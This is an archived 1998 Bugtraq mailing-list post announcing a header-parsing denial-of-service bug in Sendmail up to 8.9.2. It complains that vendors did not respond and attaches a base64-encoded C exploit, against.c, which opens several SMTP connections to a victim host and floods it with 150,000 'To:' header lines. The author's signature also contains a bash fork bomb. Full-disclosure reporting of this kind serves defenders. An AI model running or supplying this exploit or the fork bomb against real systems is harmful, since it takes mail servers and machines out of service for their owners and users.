Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--8323328-1197535808-913486907=:294
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.05.9812121921581.294@nimue.ids.pl>
Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short
description of problem + suggested patch (instead of exploit), to give
developers a chance. Unfortunately, I put together information about two
completely different problems in single posting, and it confuded a lot of
people. So, to kill any senseless discussions - again:
- The first one was 'redirection attack'; I said you could call it 'bug'
instead of 'feature', but as noone likes anonymous mailbombing,
network overloading / scanning, it's good to apply sendmail.cf patch
included in original posting; without it, your relay could be abused in
many painful ways. And yes, attack has been confirmed with 8.9.2 and
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
anything left to talk about. Dot.
- The second one was DoS attack during headers parsing - and this is
a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
Unfortunately, all feedback we received from developers was one-line
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
not to publish an exploit, but now I realized there's no chance for
response from vendors if there's no real danger. So here it is.
Attached file, against.c, should perform very 'light' attack, only
for testing purposes. If you noticed increased LA during attack,
your machine is vunerable. You had enough time to patch your system
- don't blame me, but vendors. EOF.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
--8323328-1197535808-913486907=:294
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="against.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.05.9812121921470.294@nimue.ids.pl>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="against.c"
LyoNCiAgYWdhaW5zdC5jIC0gQW5vdGhlciBTZW5kbWFpbCAoYW5kIHBpbmUg
Oy0pIERvUyAodXAgdG8gOC45LjIpDQogIChjKSAxOTk5IGJ5IDxtYXJjaGV3
QGxpbnV4LmxlcHN6eS5vZC5rb2JpZXR5LnBsPg0KDQogIFVzYWdlOiAuL2Fn
YWluc3QgZXhpc3RpbmdfdXNlcl9vbl92aWN0aW1faG9zdCB2aWN0aW1faG9z
dA0KICBFeGFtcGxlOiAuL2FnYWluc3Qgbm9ib2R5IGxhbWVycy5uZXQNCg0K
Ki8NCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+
DQojaW5jbHVkZSA8c3lzL3BhcmFtLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tl
dC5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8bmV0aW5l
dC9pbi5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8c3RkYXJn
Lmg+DQojaW5jbHVkZSA8ZXJybm8uaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4N
CiNpbmNsdWRlIDxnZXRvcHQuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNp
bmNsdWRlIDxzdHJpbmcuaD4NCg0KI2RlZmluZSBNQVhDT05OIDUNCiNkZWZp
bmUgTElORVMgICAxNTAwMDANCg0Kc3RydWN0IGhvc3RlbnQgKmhwOw0Kc3Ry
dWN0IHNvY2thZGRyX2luIHM7DQppbnQgc3Vjayxsb29wLHg7DQoNCmludCBt
YWluKGludCBhcmdjLGNoYXIqIGFyZ3ZbXSkgew0KICANCiAgcHJpbnRmKCJh
Z2FpbnN0LmMgLSBhbm90aGVyIFNlbmRtYWlsIERvUyAodXAgdG8gOC45LjIp
XG4iKTsNCg0KICBpZiAoYXJnYy0zKSB7DQogICAgcHJpbnRmKCJVc2FnZTog
JXMgdmljdGltX3VzZXIgdmljdGltX2hvc3RcbiIsYXJndlswXSk7DQogICAg
ZXhpdCgwKTsNCiAgfQ0KICAgIA0KICBocD1nZXRob3N0YnluYW1lKGFyZ3Zb
Ml0pOw0KICANCiAgaWYgKCFocCkgew0KICAgIHBlcnJvcigiZ2V0aG9zdGJ5
bmFtZSIpOw0KICAgIGV4aXQoMSk7DQogIH0NCg0KICBmcHJpbnRmKHN0ZGVy
ciwiRG9pbmcgbWVzczogIik7DQoNCiAgZm9yICg7bG9vcDxNQVhDT05OO2xv
b3ArKykgaWYgKCEoeD1mb3JrKCkpKSB7DQogICAgRklMRSogZDsNCiAgICBi
Y29weShocC0+aF9hZGRyLCh2b2lkKikmcy5zaW5fYWRkcixocC0+aF9sZW5n
dGgpOw0KICAgIHMuc2luX2ZhbWlseT1ocC0+aF9hZGRydHlwZTsNCiAgICBz
LnNpbl9wb3J0PWh0b25zKDI1KTsNCiAgICBpZiAoKHN1Y2s9c29ja2V0KEFG
X0lORVQsU09DS19TVFJFQU0sMCkpPDApIHBlcnJvcigic29ja2V0Iik7DQog
ICAgaWYgKGNvbm5lY3Qoc3Vjaywoc3RydWN0IHNvY2thZGRyICopJnMsc2l6
ZW9mKHMpKSkgcGVycm9yKCJjb25uZWN0Iik7DQogICAgaWYgKCEoZD1mZG9w
ZW4oc3VjaywidyIpKSkgeyBwZXJyb3IoImZkb3BlbiIpOyBleGl0KDApOyB9
DQoNCiAgICB1c2xlZXAoMTAwMDAwKTsNCg0KICAgIGZwcmludGYoZCwiaGVs
byB0d2VldHlcbiIpOw0KICAgIGZwcmludGYoZCwibWFpbCBmcm9tOiB0d2Vl
dHlAcG9sYm94LmNvbVxuIik7DQogICAgZnByaW50ZihkLCJyY3B0IHRvOiAl
c0Alc1xuIixhcmd2WzFdLGFyZ3ZbMl0pOw0KICAgIGZwcmludGYoZCwiZGF0
YVxuIik7DQoNCiAgICB1c2xlZXAoMTAwMDAwKTsNCg0KICAgIGZvcihsb29w
PTA7bG9vcDxMSU5FUztsb29wKyspIHsNCiAgICAgIGlmICghKGxvb3AlMTAw
KSkgZnByaW50ZihzdGRlcnIsIi4iKTsNCiAgICAgIGZwcmludGYoZCwiVG86
IHhcbiIpOw0KICAgIH0NCg0KICAgIGZwcmludGYoZCwiXG5cblxuc29tZWRh
dGFcblxuXG4iKTsNCg0KICAgIGZwcmludGYoZCwiLlxuIik7DQoNCiAgICBz
bGVlcCgxKTsNCg0KICAgIGZwcmludGYoZCwicXVpdFxuIik7DQogICAgZmZs
dXNoKGQpOw0KDQogICAgc2xlZXAoMTAwKTsNCiAgICBzaHV0ZG93bihzdWNr
LDIpOw0KICAgIGNsb3NlKHN1Y2spOw0KICAgIGV4aXQoMCk7DQogIH0NCg0K
ICB3YWl0cGlkKHgsJmxvb3AsMCk7DQoNCiAgZnByaW50ZihzdGRlcnIsIm9r
XG4iKTsNCg0KICByZXR1cm4gMDsNCn0NCg0K
--8323328-1197535808-913486907=:294--
